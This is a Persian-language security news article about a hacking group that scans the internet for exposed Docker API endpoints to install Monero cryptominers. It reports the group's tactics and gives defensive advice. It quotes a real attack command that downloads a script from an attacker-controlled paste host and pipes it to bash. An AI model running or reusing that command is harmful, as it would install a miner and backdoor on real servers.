هشدار محققان درباره

پایانه‌های API در معرض افشای برنامه داکر هدف حملات هکرها

یافته‌‌های جدید محققان امنیتی نشان می‌دهد که یک گروه هک در حال اسکن گسترده اینترنت و جستجوی سرورهایی است که پایانه‌های API برنامه داکر (Docker) روی آن‌ها در معرض افشا قرار دارد. گفته می‌شود هدف هکرها از این اسکن، مورد هدف قرار دادن سرورها برای نصب استخراج‌کننده‌های ارزهای دیجیتال است.
اسکن پایانه‌های API برنامه داکر توسط هکرها

براساس گزارش‌های منتشر شده، یک گروه هک در روزهای اخیر به‌صورت گسترده در حال اسکن اینترنت برای یافتن سرورهایی‌ است که برنامه داکر روی آن‌ها در حال اجرا است. این گروه هک با مورد هدف قرار دادن سرورهایی که پایانه‌های API برنامه داکر آن‌ها در معرض افشا قرار دارد، اقدام به نصب استخراج کننده‌های ارزهای دیجیتال می‌کند.

این عملیات اسکن عظیم در تاریخ ۲۵ نوامبر آغاز شده و با توجه به گسترده بودن آن، بلافاصله مورد توجه محققان امنیتی قرار گرفت. به گفته محققان، در این اسکن یک کانتینر (container) براساس سیستم‌ عامل Alpine جهت پی‌لود روی برنامه داکر اجرا می‌شود. گفته می‌شود گروه هک پشتیبانی کننده این حملات بیش از ۵۹ هزار نشانی IP را اسکن کرده است.

این گروه پس از شناسایی سرورهای هدف خود، دستور زیر را برای راه‌اندازی پی‌لودهای خود اجرا می‌کند.

chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;

 

این فرمان، اسکریپت Bash را از سرور مهاجمان دانلود و نصب می‌کند. سپس این اسکریپت یک استخراج کننده ارز دیجیتال XMRRig را نصب می‌کند. براساس اطلاعات موجود، با گذشت دو روز از آغاز فعالیت این گروه، هکرها موفق شده‌اند ۱۴.۸۲ مونرو (XMR) که بیش ۷۴۰ دلار ارزش دارد استخراج کنند.
بررسی‌های محققان نشان می‌دهد که این عملیات بدافزاری، دارای ابزار‌های دفاع از خود است.

محققان با بررسی دقیق این اسکریپت دریافتند که هکرها نه تنها راه‌حل‌های امنیتی را غیرفعال می‌کنند، بلکه فرآیند‌های lso مرتبط با بات‌نت‌های استخراج‌کننده رقیب از جمله DDG را غیرفعال می‌کنند.

علاوه بر این محققان عملکردی در این اسکریپت مخرب کشف کرده‌اند که یک میزبان آلوده را در جستجوی فایل‌های پیکربندی rConfig اسکن می‌کند که پس از پیدا کردن، آن را رمزگذاری کرده و به مهاجمان ارسال می‌کند.

کریگ اچ رولند، موسس Sandfly Security درخصوص این حملات گفته است که هکرها در حال ساختن درب‌پشتی در کانتینر‌های هک شده هستند و کلید‌های SSH را برای ایجاد دسترسی راحت‌تر و راهی برای کنترل همه سرورهای آلوده از راه دور در آن‌ها به‌جا می‌گذارند.

محققان ضمن هشدار درخصوص این حملات، به کاربران و سازمان‌هایی که از برنامه داکر استفاده می‌کنند توصیه کرده‌اند که سریعا بررسی کنند که آیا پایانه‌های API سرورهای آن‌ها را در اینترنت در معرض افشا قرار دارد یا نه، سپس خروجی‌ها را ببندند و فعالیت کانتینر‌های ناشناس را متوقف کنند.

 

 

توضیحات بیشتر در:

A hacking group is hijacking Docker systems with exposed API endpoints